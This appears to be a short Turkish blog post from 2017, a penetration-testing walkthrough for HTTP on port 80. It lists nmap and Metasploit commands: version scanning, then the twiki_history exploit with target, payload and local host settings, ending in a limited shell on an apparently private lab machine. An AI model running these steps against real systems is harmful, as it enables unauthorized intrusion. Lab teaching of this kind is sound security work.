HTTP Nedir? HTTP (İngilizce Hyper-Text Transfer Protocol, Türkçe Hiper-Metin Transfer Protokolü) bir kaynaktan dağıtılan ve ortak ku...

Hyper-Text Transfer Protocol (http) | 80/tcp | Pentesting

9/24/2017 0 Yorumlar



HTTP Nedir?

HTTP (İngilizce Hyper-Text Transfer Protocol, Türkçe Hiper-Metin Transfer Protokolü) bir kaynaktan dağıtılan ve ortak kullanıma açık olan hiperortam bilgi sistemleri için uygulama seviyesinde bir iletişim protokolüdür.

kaynak: wikipedia

"nmap -sV -p 3632 192.168.198.129" -> nmap -sS -p <taranacak_port> <hedef_ip> şeklinde yazdık.



############################################################################################

"search http_version" -> HTTP servisinin hangi sürümünü kullanduğını öğrenmek için http_version modülünü kullanacağız.

"set RHOSTS" -> set komutuyla RemoteHost yani kurbanın ip adresini girdik.

"exploit/run" -> diyip bilgi toplaması için komut verdik.



############################################################################################

"back" -> exploitten çıktık.

"search twiki_history" -> Metasploit içerisinden bu adın geçtiği exploiti bulmak için arama yaptık.

"use exp_name" -> use komutuyla exploit’i kullanacağız.

exploit(twiki_history)"show options" -> Exploit’in sisteme erişmesi için gerekli ayarlamaların neler olduğunu öğrenmek için bu komutu kullandık. rport’un default değeri 80, 80/tcp portuna yönelik bir saldırı gerçekleştirdiğimizi teyit ettik



############################################################################################

exploit(twiki_history)"set rhosts" -> Hedef ip yazıyoruz.
exploit(twiki_history)"set PAYLOAD <kullanılacak_payload>" -> Kullanacağımız payload’ı ayarlıyoruz.
exploit(twiki_history)"show options" -> Exploit’in sisteme erişmesi için gerekli ayarlamaların neler olduğunu öğrenmek için bu komutu kullandık.



exploit(twiki_history)"set LHOST" -> Local ip adresimizi yazıyoruz. Komut çalıştırabileceğiniz cmd prompt’una win: ipconfig / linux: ifconfig yazıp öğrenebilirsiniz.

exploit(twiki_history)"exploit" -> Sızma işlemini başlatıyoruz.



Shell acıldı , komut çalıştırabiliriz fakat kısıtlı , root değiliz, çeşitli local root exploit’lerle tam yetkiye erişebilirsiniz, onu da ilerideli konularımda göstereceğim.



############################################################################################

0 yorum: